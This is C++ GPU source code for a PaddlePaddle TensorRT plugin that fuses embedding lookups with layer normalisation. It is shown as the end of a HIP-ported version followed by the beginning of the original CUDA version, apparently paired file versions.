exprBuilder.operation(nvinfer1::DimensionOperation::kPROD, *maskSize, *exprBuilder.constant(2)); auto Bplus1 = inputs[0].d[0]; // pos_id auto one = exprBuilder.constant(1); auto B = exprBuilder.operation( nvinfer1::DimensionOperation::kSUB, *Bplus1, *one); nvinfer1::DimsExprs ret; ret.nbDims = 2; ret.d[0] = B; ret.d[1] = fp16maskSize; return ret; } else { nvinfer1::DimsExprs ret; ret.nbDims = 1; ret.d[0] = inputs[nbInputs - 1].d[1]; // mask id: max seqlen return ret; } } nvinfer1::DimsExprs EmbLayerNormVarSeqlenPluginMTron::getOutputDimensions( int32_t outputIndex, nvinfer1::DimsExprs const* inputs, int32_t nbInputs, nvinfer1::IExprBuilder& exprBuilder) noexcept { // Input should be input ids and token ids and cumulative seqlens // Output should be the embeddings tensor and mask indices for (int i = 1; i < nbInputs - 1; ++i) { assert(inputs[i].nbDims == 1); // seq length assert(inputs[i].nbDims == inputs[1].nbDims); // same shape } assert(inputs[0].nbDims == 1); // pos_id: B+1 if (outputIndex == 0 || outputIndex == 1) { nvinfer1::DimsExprs ret; ret.nbDims = 4; ret.d[0] = inputs[1].d[0]; // sum of seq length ret.d[1] = exprBuilder.constant(mLd); ret.d[2] = exprBuilder.constant(1); ret.d[3] = exprBuilder.constant(1); return ret; } else { nvinfer1::DimsExprs ret; ret.nbDims = 1; ret.d[0] = inputs[nbInputs - 1].d[1]; // mask id: max seqlen return ret; } } bool EmbLayerNormVarSeqlenPluginBase::supportsFormatCombination( int32_t pos, nvinfer1::PluginTensorDesc const* inOut, int32_t nbInputs, int32_t nbOutputs) noexcept { assert(nbOutputs == 3); nvinfer1::PluginTensorDesc const& desc = inOut[pos]; if (desc.format != nvinfer1::TensorFormat::kLINEAR) { return false; } if (pos == 0) { // pos_id return desc.dims.nbDims == 1 && desc.type == nvinfer1::DataType::kINT32; } if (pos == 1) { // input_id return desc.dims.nbDims == 1 && desc.type == nvinfer1::DataType::kINT32; } nvinfer1::PluginTensorDesc const& prev = inOut[1]; // input_ids if (1 < pos && pos < (nbInputs - 1)) { // other ids: check it's the same as input_ids return desc.type == prev.type && desc.dims.nbDims == 1 && desc.dims.d[0] == prev.dims.d[0]; } if (pos == nbInputs - 1) { // mask id return desc.type == mType; } // embedded sequence if (pos == nbInputs) { return desc.type == mType && desc.dims.nbDims == 4 && desc.dims.d[0] == inOut[1].dims.d[0] && desc.dims.d[2] == 1 && desc.dims.d[3] == 1; } // mask(HFace) or pre_layernorm_bias(MTron) if (pos == nbInputs + 1) { return desc.type == mType; } // max seqlen if (pos == nbInputs + 2) { return desc.type == mType; } } void checkConfigurationInputs(nvinfer1::DynamicPluginTensorDesc const* inputs, int32_t nbInputs, nvinfer1::DynamicPluginTensorDesc const* outputs, int32_t nbOutputs) noexcept { // Validate input arguments assert(nbOutputs == 3); assert(inputs[0].desc.dims.nbDims == 1); assert(inputs[0].desc.type == nvinfer1::DataType::kINT32); for (int i = 1; i < nbInputs - 1; ++i) { assert(inputs[i].desc.dims.nbDims == 1); assert(inputs[i].desc.dims.d[0] == inputs[1].desc.dims.d[0]); assert(inputs[i].desc.type == nvinfer1::DataType::kINT32); } assert(outputs[0].desc.dims.nbDims == 4); assert(static_cast<size_t>(outputs[0].desc.dims.d[0]) == static_cast<size_t>(inputs[1].desc.dims.d[0])); assert(outputs[0].desc.dims.d[2] == 1); assert(outputs[0].desc.dims.d[3] == 1); } void EmbLayerNormVarSeqlenPluginHFace::configurePlugin( nvinfer1::DynamicPluginTensorDesc const* inputs, int32_t nbInputs, nvinfer1::DynamicPluginTensorDesc const* outputs, int32_t nbOutputs) noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace configurePlugin"); checkConfigurationInputs(inputs, nbInputs, outputs, nbOutputs); assert(static_cast<size_t>(outputs[0].desc.dims.d[1]) == static_cast<size_t>(mLd)); int32_t const B = inputs[0].desc.dims.d[0] - 1; // check mask assert(outputs[1].desc.dims.nbDims == 2); if (B > 0) { assert(outputs[1].desc.dims.d[0] == B); } assert((outputs[1].desc.dims.d[1] == 2 * packedMaskSize384) || (outputs[1].desc.dims.d[1] == 2 * packedMaskSize128) || (outputs[1].desc.dims.d[1] == 2 * packedMaskSize256)); assert(outputs[0].desc.type == mType); assert(outputs[1].desc.type == nvinfer1::DataType::kHALF); } void EmbLayerNormVarSeqlenPluginMTron::configurePlugin( nvinfer1::DynamicPluginTensorDesc const* inputs, int32_t nbInputs, nvinfer1::DynamicPluginTensorDesc const* outputs, int32_t nbOutputs) noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron configurePlugin"); checkConfigurationInputs(inputs, nbInputs, outputs, nbOutputs); assert(static_cast<size_t>(outputs[0].desc.dims.d[1]) == static_cast<size_t>(mLd)); assert(outputs[1].desc.dims.nbDims == 4); assert(static_cast<size_t>(outputs[1].desc.dims.d[0]) == static_cast<size_t>(inputs[1].desc.dims.d[0])); assert(static_cast<size_t>(outputs[1].desc.dims.d[1]) == static_cast<size_t>(mLd)); assert(outputs[1].desc.dims.d[2] == 1); assert(outputs[1].desc.dims.d[3] == 1); assert(outputs[0].desc.type == mType); assert(outputs[1].desc.type == mType); } size_t EmbLayerNormVarSeqlenPluginBase::getWorkspaceSize( nvinfer1::PluginTensorDesc const* inputs, int32_t nbInputs, nvinfer1::PluginTensorDesc const* outputs, int32_t nbOutputs) const noexcept { return 0; } int32_t EmbLayerNormVarSeqlenPluginHFace::enqueue( nvinfer1::PluginTensorDesc const* inputDesc, nvinfer1::PluginTensorDesc const* outputDesc, void const* const* inputs, void* const* outputs, void* workspace, hipStream_t stream) noexcept { int32_t batchSize = inputDesc[0].dims.d[0] - 1; // read out the maximum sequence length from the dummy input int32_t const maxSeqlen = inputDesc[nbLookupTables_].dims.d[0]; int32_t S = 384; if (maxSeqlen <= 128) { S = 128; } else if (maxSeqlen <= 192) { S = 192; } else if (maxSeqlen <= 256) { S = 256; } const float* beta = mBetaDev.get(); const float* gamma = mGammaDev.get(); if (mType == nvinfer1::DataType::kFLOAT) { auto output = static_cast<float*>(outputs[0]); if (nbLookupTables_ == 2) { return embSkipLayerNormHFace_2<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), mIdsVocabSize[0], mIdsVocabSize[1], output); } else if (nbLookupTables_ == 3) { return embSkipLayerNormHFace_3<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), static_cast<float const*>(mIdsEmbPtrs[2]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], output); } else if (nbLookupTables_ == 4) { return embSkipLayerNormHFace_4<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), static_cast<int32_t const*>(inputs[3]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), static_cast<float const*>(mIdsEmbPtrs[2]), static_cast<float const*>(mIdsEmbPtrs[3]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], mIdsVocabSize[3], output); } else { PADDLE_THROW(platform::errors::InvalidArgument( "Only support 2,3,4 lookup_tables fused ")); } } else if (mType == nvinfer1::DataType::kHALF) { auto output = static_cast<half*>(outputs[0]); if (nbLookupTables_ == 2) { return embSkipLayerNormHFace_2<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), mIdsVocabSize[0], mIdsVocabSize[1], output); } else if (nbLookupTables_ == 3) { return embSkipLayerNormHFace_3<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), static_cast<half const*>(mIdsEmbPtrs[2]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], output); } else if (nbLookupTables_ == 4) { return embSkipLayerNormHFace_4<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), static_cast<int32_t const*>(inputs[3]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), static_cast<half const*>(mIdsEmbPtrs[2]), static_cast<half const*>(mIdsEmbPtrs[3]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], mIdsVocabSize[3], output); } else { PADDLE_THROW(platform::errors::InvalidArgument( "Only support 2,3,4 lookup_tables fused ")); } } else { PADDLE_THROW(platform::errors::InvalidArgument( "Unsupported type error, expected [kHALF,kFLOAT]")); } return STATUS_SUCCESS; } int32_t EmbLayerNormVarSeqlenPluginMTron::enqueue( nvinfer1::PluginTensorDesc const* inputDesc, nvinfer1::PluginTensorDesc const* outputDesc, void const* const* inputs, void* const* outputs, void* workspace, hipStream_t stream) noexcept { int32_t batchSize = inputDesc[0].dims.d[0] - 1; // read out the maximum sequence length from the dummy input int32_t const maxSeqlen = inputDesc[nbLookupTables_].dims.d[0]; int32_t S = 384; if (maxSeqlen <= 128) { S = 128; } else if (maxSeqlen <= 192) { S = 192; } else if (maxSeqlen <= 256) { S = 256; } const float* beta = mBetaDev.get(); const float* gamma = mGammaDev.get(); if (mType == nvinfer1::DataType::kFLOAT) { auto output = static_cast<float*>(outputs[0]); auto skip = static_cast<float*>(outputs[1]); if (nbLookupTables_ == 2) { return embSkipLayerNormMTron_2<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), mIdsVocabSize[0], mIdsVocabSize[1], output, skip); } else if (nbLookupTables_ == 3) { return embSkipLayerNormMTron_3<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), static_cast<float const*>(mIdsEmbPtrs[2]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], output, skip); } else if (nbLookupTables_ == 4) { return embSkipLayerNormMTron_4<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), static_cast<int32_t const*>(inputs[3]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), static_cast<float const*>(mIdsEmbPtrs[2]), static_cast<float const*>(mIdsEmbPtrs[3]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], mIdsVocabSize[3], output, skip); } else { PADDLE_THROW(platform::errors::InvalidArgument( "Only support 2,3,4 lookup_tables fused ")); } } else if (mType == nvinfer1::DataType::kHALF) { auto output = static_cast<half*>(outputs[0]); auto skip = static_cast<half*>(outputs[1]); if (nbLookupTables_ == 2) { return embSkipLayerNormMTron_2<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), mIdsVocabSize[0], mIdsVocabSize[1], output, skip); } else if (nbLookupTables_ == 3) { return embSkipLayerNormMTron_3<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), static_cast<half const*>(mIdsEmbPtrs[2]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], output, skip); } else if (nbLookupTables_ == 4) { return embSkipLayerNormMTron_4<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), static_cast<int32_t const*>(inputs[3]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), static_cast<half const*>(mIdsEmbPtrs[2]), static_cast<half const*>(mIdsEmbPtrs[3]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], mIdsVocabSize[3], output, skip); } else { PADDLE_THROW(platform::errors::InvalidArgument( "Only support 2,3,4 lookup_tables fused ")); } } else { PADDLE_THROW(platform::errors::InvalidArgument( "Unsupported type error, expected [kHALF,kFLOAT]")); } return STATUS_SUCCESS; } // IPluginV2Ext Methods nvinfer1::DataType EmbLayerNormVarSeqlenPluginBase::getOutputDataType( int32_t index, nvinfer1::DataType const* inputTypes, int32_t nbInputs) const noexcept { assert(index == 0 || index == 1); if (index == 0) { assert(mType == nvinfer1::DataType::kHALF || mType == nvinfer1::DataType::kFLOAT); return mType; } return nvinfer1::DataType::kHALF; } // IPluginV2 Methods char const* EmbLayerNormVarSeqlenPluginBase::getPluginType() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_NAME; } char const* EmbLayerNormVarSeqlenPluginHFace::getPluginVersion() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_VERSION_HFACE; } char const* EmbLayerNormVarSeqlenPluginMTron::getPluginVersion() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_VERSION_MTRON; } int32_t EmbLayerNormVarSeqlenPluginBase::getNbOutputs() const noexcept { return 3; } int32_t EmbLayerNormVarSeqlenPluginHFace::initialize() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace initialize"); return 0; } int32_t EmbLayerNormVarSeqlenPluginMTron::initialize() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron initialize"); return 0; } void EmbLayerNormVarSeqlenPluginHFace::terminate() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace terminate"); } void EmbLayerNormVarSeqlenPluginMTron::terminate() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron terminate"); } size_t EmbLayerNormVarSeqlenPluginBase::getSerializationSize() const noexcept { size_t const wordSize = getElementSize(mType); return 2 * sizeof(float) * mLd // beta + gamma + sizeof(mType) // + sizeof(mLd) // + mIdsVocabSize.size() * sizeof(mIdsVocabSize[0]) // + wordSize * mLd * accumulate( mIdsVocabSize.begin(), mIdsVocabSize.end(), 0) // ids emb + sizeof(nbLookupTables_); // numbers of lookup_table } void EmbLayerNormVarSeqlenPluginBase::serialize(void* buffer) const noexcept { serialize_value(&buffer, mType); serialize_value(&buffer, mLd); serialize_value(&buffer, nbLookupTables_); for (size_t i = 0; i < mIdsVocabSize.size(); ++i) { serialize_value(&buffer, mIdsVocabSize[i]); } char* d = static_cast<char*>(buffer); size_t const wordSize = getElementSize(mType); serFromDev(&d, mBetaDev.get(), mLd); serFromDev(&d, mGammaDev.get(), mLd); for (size_t i = 0; i < mIdsEmbPtrs.size(); ++i) { serFromDev(&d, static_cast<char*>(mIdsEmbPtrs[i]), mLd * mIdsVocabSize[i] * wordSize); } } void EmbLayerNormVarSeqlenPluginBase::destroy() noexcept { // This gets called when the network containing plugin is destroyed mBetaDev.reset(nullptr); mGammaDev.reset(nullptr); for (size_t i = 0; i < mIdsEmbPtrs.size(); ++i) { hipFree(mIdsEmbPtrs[i]); } delete this; } void EmbLayerNormVarSeqlenPluginHFace::destroy() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace destroy"); EmbLayerNormVarSeqlenPluginBase::destroy(); } void EmbLayerNormVarSeqlenPluginMTron::destroy() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron destroy"); EmbLayerNormVarSeqlenPluginBase::destroy(); } void EmbLayerNormVarSeqlenPluginBase::setPluginNamespace( char const* libNamespace) noexcept { mNamespace = libNamespace; } char const* EmbLayerNormVarSeqlenPluginBase::getPluginNamespace() const noexcept { return mNamespace.c_str(); } EmbLayerNormVarSeqlenPluginBaseCreator:: EmbLayerNormVarSeqlenPluginBaseCreator() {} char const* EmbLayerNormVarSeqlenPluginBaseCreator::getPluginName() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_NAME; } char const* EmbLayerNormVarSeqlenPluginHFaceCreator::getPluginVersion() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_VERSION_HFACE; } char const* EmbLayerNormVarSeqlenPluginMTronCreator::getPluginVersion() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_VERSION_MTRON; } nvinfer1::PluginFieldCollection const* EmbLayerNormVarSeqlenPluginBaseCreator::getFieldNames() noexcept { return &mFC; } bool initializeFields(nvinfer1::PluginFieldCollection const* fc, nvinfer1::Weights* beta, nvinfer1::Weights* gamma, std::vector<nvinfer1::Weights>* IdsEmb) { bool output_fp16 = false; for (int32_t i = 0; i < fc->nbFields; i++) { std::string field_name(fc->fields[i].name); if (field_name.compare("bert_embeddings_layernorm_beta") == 0) { TRANSFORMER_DEBUG_MSG("Building bert_embeddings_layernorm_beta..."); beta->values = fc->fields[i].data; beta->count = fc->fields[i].length; beta->type = fieldTypeToDataType(fc->fields[i].type); } if (field_name.compare("bert_embeddings_layernorm_gamma") == 0) { TRANSFORMER_DEBUG_MSG("Building bert_embeddings_layernorm_gamma..."); gamma->values = fc->fields[i].data; gamma->count = fc->fields[i].length; gamma->type = fieldTypeToDataType(fc->fields[i].type); } if (field_name.compare("output_fp16") == 0) { TRANSFORMER_DEBUG_MSG("Building output_fp16..."); assert(fc->fields[i].type == nvinfer1::PluginFieldType::kINT32); output_fp16 = static_cast<int32_t const*>(fc->fields[i].data)[0] != 0; } if (field_name.compare("bert_embeddings_word_embeddings_" + std::to_string(i - 3)) == 0) { TRANSFORMER_DEBUG_MSG( ("bert_embeddings_word_embeddings_" + std::to_string(i - 3)).c_str()); nvinfer1::Weights tem; tem.values = fc->fields[i].data; tem.count = fc->fields[i].length; tem.type = fieldTypeToDataType(fc->fields[i].type); IdsEmb->push_back(tem); } } return output_fp16; } nvinfer1::IPluginV2* EmbLayerNormVarSeqlenPluginHFaceCreator::createPlugin( char const* name, nvinfer1::PluginFieldCollection const* fc) noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenHFace createPlugin"); nvinfer1::Weights beta; nvinfer1::Weights gamma; std::vector<nvinfer1::Weights> IdsEmb; bool output_fp16 = initializeFields(fc, &beta, &gamma, &IdsEmb); TRANSFORMER_DEBUG_MSG("Building the Plugin..."); EmbLayerNormVarSeqlenPluginHFace* p = new EmbLayerNormVarSeqlenPluginHFace( name, output_fp16 ? nvinfer1::DataType::kHALF : nvinfer1::DataType::kFLOAT, beta, gamma, IdsEmb); return p; } nvinfer1::IPluginV2* EmbLayerNormVarSeqlenPluginMTronCreator::createPlugin( char const* name, nvinfer1::PluginFieldCollection const* fc) noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenMTron createPlugin"); nvinfer1::Weights beta; nvinfer1::Weights gamma; std::vector<nvinfer1::Weights> IdsEmb; bool output_fp16 = initializeFields(fc, &beta, &gamma, &IdsEmb); TRANSFORMER_DEBUG_MSG("Building the Plugin..."); EmbLayerNormVarSeqlenPluginMTron* p = new EmbLayerNormVarSeqlenPluginMTron( name, output_fp16 ? nvinfer1::DataType::kHALF : nvinfer1::DataType::kFLOAT, beta, gamma, IdsEmb); return p; } nvinfer1::IPluginV2* EmbLayerNormVarSeqlenPluginHFaceCreator::deserializePlugin( char const* name, void const* serialData, size_t serialLength) noexcept { return new EmbLayerNormVarSeqlenPluginHFace(name, serialData, serialLength); } nvinfer1::IPluginV2* EmbLayerNormVarSeqlenPluginMTronCreator::deserializePlugin( char const* name, void const* serialData, size_t serialLength) noexcept { return new EmbLayerNormVarSeqlenPluginMTron(name, serialData, serialLength); } void EmbLayerNormVarSeqlenPluginBaseCreator::setPluginNamespace( char const* libNamespace) noexcept { mNamespace = libNamespace; } char const* EmbLayerNormVarSeqlenPluginBaseCreator::getPluginNamespace() const noexcept { return mNamespace.c_str(); } } // namespace plugin } // namespace tensorrt } // namespace inference } // namespace paddle
c16285441bba604609620d24dde7c4709f3457c0.cu
// Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved. // SPDX-FileCopyrightText: Copyright (c) 1993-2022 NVIDIA CORPORATION & // AFFILIATES. All rights reserved. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #include "paddle/fluid/inference/tensorrt/plugin/many_emb_layernorm_varseqlen_plugin.h" #include <cuda.h> #include <cstring> #include <vector> #include "NvInfer.h" namespace paddle { namespace inference { namespace tensorrt { namespace plugin { constexpr size_t threadsPerCta128 = 2 * 2 * 32; constexpr size_t threadsPerCta256 = 1 * 4 * 32; constexpr size_t threadsPerCta384 = 1 * 8 * 32; // The number of xmmas in the M dimension. We use one uint32_t per XMMA in the M // dimension: (s + 16*warps_m - 1) / (16*warps_m); constexpr size_t xmmasM128 = 4; constexpr size_t xmmasM256 = 16; constexpr size_t xmmasM384 = 24; // Packed mask size per batch. Layout is XMMAS_M * THREADS_PER_CTA. constexpr size_t packedMaskSize128 = xmmasM128 * threadsPerCta128; constexpr size_t packedMaskSize256 = xmmasM256 * threadsPerCta256; constexpr size_t packedMaskSize384 = xmmasM384 * threadsPerCta384; char const* EMB_LAYER_NORM_VAR_SEQLEN_VERSION_HFACE{"1"}; char const* EMB_LAYER_NORM_VAR_SEQLEN_VERSION_MTRON{"2"}; char const* EMB_LAYER_NORM_VAR_SEQLEN_NAME{ "ManyEmbLayerNormVarlenPluginDynamic"}; // Static class fields initialization nvinfer1::PluginFieldCollection EmbLayerNormVarSeqlenPluginBaseCreator::mFC{}; std::vector<nvinfer1::PluginField> EmbLayerNormVarSeqlenPluginBaseCreator::mPluginAttributes; EmbLayerNormVarSeqlenPluginBase::EmbLayerNormVarSeqlenPluginBase( std::string const& name, nvinfer1::DataType const type, nvinfer1::Weights const& beta, nvinfer1::Weights const& gamma, const std::vector<nvinfer1::Weights>& IdsEmb) : mLayerName(name), mLd(beta.count), mType(type), mIdsEmb_(IdsEmb), nbLookupTables_(static_cast<int>(IdsEmb.size())) { // Assuming Weights.count is the number of elements and not bytes assert(beta.count == gamma.count); mBeta.convertAndCopy(beta, nvinfer1::DataType::kFLOAT); mGamma.convertAndCopy(gamma, nvinfer1::DataType::kFLOAT); copyToDevice(&mGamma, sizeof(float) * mGamma.count, &mGammaDev); copyToDevice(&mBeta, sizeof(float) * mBeta.count, &mBetaDev); for (size_t i = 0; i < mIdsEmb_.size(); ++i) { assert(mIdsEmb_[i].count % mLd == 0); mIdsVocabSize.push_back(int32_t(mIdsEmb_[i].count / mLd)); WeightsWithOwnership tem_weight; tem_weight.convertAndCopy(mIdsEmb_[i], mType); void* cudaMem{nullptr}; PADDLE_ENFORCE_GPU_SUCCESS( cudaMalloc(&cudaMem, getWeightsSize(tem_weight, mType))); PADDLE_ENFORCE_GPU_SUCCESS(cudaMemcpy(cudaMem, tem_weight.values, getWeightsSize(tem_weight, mType), cudaMemcpyHostToDevice)); mIdsEmbPtrs.push_back(cudaMem); } } EmbLayerNormVarSeqlenPluginBase::EmbLayerNormVarSeqlenPluginBase( std::string const& name, void const* data, size_t length) : mLayerName(name), mGammaDev(nullptr), mBetaDev(nullptr), mIdsEmbPtrs{}, mIdsEmb_{} { // Deserialize in the same order as serialization deserialize_value(&data, &length, &mType); deserialize_value(&data, &length, &mLd); deserialize_value(&data, &length, &nbLookupTables_); for (int32_t i = 0; i < nbLookupTables_; ++i) { int32_t tem; deserialize_value(&data, &length, &tem); mIdsVocabSize.push_back(tem); } char const* d = static_cast<char const*>(data); mBeta.convertAndCopy(&d, mLd, nvinfer1::DataType::kFLOAT); mGamma.convertAndCopy(&d, mLd, nvinfer1::DataType::kFLOAT); for (int32_t i = 0; i < nbLookupTables_; ++i) { nvinfer1::Weights pre_tem_weight; pre_tem_weight.type = mType; pre_tem_weight.count = mLd * size_t(mIdsVocabSize[i]); const auto nbBytes = mLd * size_t(mIdsVocabSize[i]) * getElementSize(mType); auto destBuf = new char[nbBytes]; pre_tem_weight.values = destBuf; std::copy_n(d, nbBytes, destBuf); d += nbBytes; mIdsEmb_.push_back(pre_tem_weight); } } EmbLayerNormVarSeqlenPluginHFace::EmbLayerNormVarSeqlenPluginHFace( std::string const& name, nvinfer1::DataType const type, nvinfer1::Weights const& beta, nvinfer1::Weights const& gamma, const std::vector<nvinfer1::Weights>& IdsEmb) : EmbLayerNormVarSeqlenPluginBase(name, type, beta, gamma, IdsEmb) {} EmbLayerNormVarSeqlenPluginHFace::EmbLayerNormVarSeqlenPluginHFace( std::string const& name, void const* data, size_t length) : EmbLayerNormVarSeqlenPluginBase(name, data, length) { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace deserialize"); } EmbLayerNormVarSeqlenPluginMTron::EmbLayerNormVarSeqlenPluginMTron( std::string const& name, nvinfer1::DataType const type, nvinfer1::Weights const& beta, nvinfer1::Weights const& gamma, const std::vector<nvinfer1::Weights>& IdsEmb) : EmbLayerNormVarSeqlenPluginBase(name, type, beta, gamma, IdsEmb) {} EmbLayerNormVarSeqlenPluginMTron::EmbLayerNormVarSeqlenPluginMTron( std::string const& name, void const* data, size_t length) : EmbLayerNormVarSeqlenPluginBase(name, data, length) { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron deserialize"); } // IPluginV2DynamicExt Methods nvinfer1::IPluginV2DynamicExt* EmbLayerNormVarSeqlenPluginHFace::clone() const noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace clone"); auto p = new EmbLayerNormVarSeqlenPluginHFace( mLayerName, mType, mBeta, mGamma, mIdsEmb_); p->setPluginNamespace(mNamespace.c_str()); return p; } nvinfer1::IPluginV2DynamicExt* EmbLayerNormVarSeqlenPluginMTron::clone() const noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron clone"); auto p = new EmbLayerNormVarSeqlenPluginMTron( mLayerName, mType, mBeta, mGamma, mIdsEmb_); p->setPluginNamespace(mNamespace.c_str()); return p; } nvinfer1::DimsExprs EmbLayerNormVarSeqlenPluginHFace::getOutputDimensions( int32_t outputIndex, nvinfer1::DimsExprs const* inputs, int32_t nbInputs, nvinfer1::IExprBuilder& exprBuilder) noexcept { for (int i = 1; i < nbInputs - 1; ++i) { assert(inputs[i].nbDims == 1); // seq length assert(inputs[i].nbDims == inputs[1].nbDims); // same shape } assert(inputs[0].nbDims == 1); // pos_id: B+1 if (outputIndex == 0) { nvinfer1::DimsExprs ret; ret.nbDims = 4; ret.d[0] = inputs[1].d[0]; // sum of seq length ret.d[1] = exprBuilder.constant(mLd); ret.d[2] = exprBuilder.constant(1); ret.d[3] = exprBuilder.constant(1); return ret; } else if (outputIndex == 1) { // This is a hack: we just report some mask size and rely the plugins to // play nicely together. // At runtime, depending on the actual maxSeqlen, the size might be // different. int32_t maskSize_ = packedMaskSize384; auto maskSize = exprBuilder.constant(maskSize_); auto fp16maskSize = exprBuilder.operation(nvinfer1::DimensionOperation::kPROD, *maskSize, *exprBuilder.constant(2)); auto Bplus1 = inputs[0].d[0]; // pos_id auto one = exprBuilder.constant(1); auto B = exprBuilder.operation( nvinfer1::DimensionOperation::kSUB, *Bplus1, *one); nvinfer1::DimsExprs ret; ret.nbDims = 2; ret.d[0] = B; ret.d[1] = fp16maskSize; return ret; } else { nvinfer1::DimsExprs ret; ret.nbDims = 1; ret.d[0] = inputs[nbInputs - 1].d[1]; // mask id: max seqlen return ret; } } nvinfer1::DimsExprs EmbLayerNormVarSeqlenPluginMTron::getOutputDimensions( int32_t outputIndex, nvinfer1::DimsExprs const* inputs, int32_t nbInputs, nvinfer1::IExprBuilder& exprBuilder) noexcept { // Input should be input ids and token ids and cumulative seqlens // Output should be the embeddings tensor and mask indices for (int i = 1; i < nbInputs - 1; ++i) { assert(inputs[i].nbDims == 1); // seq length assert(inputs[i].nbDims == inputs[1].nbDims); // same shape } assert(inputs[0].nbDims == 1); // pos_id: B+1 if (outputIndex == 0 || outputIndex == 1) { nvinfer1::DimsExprs 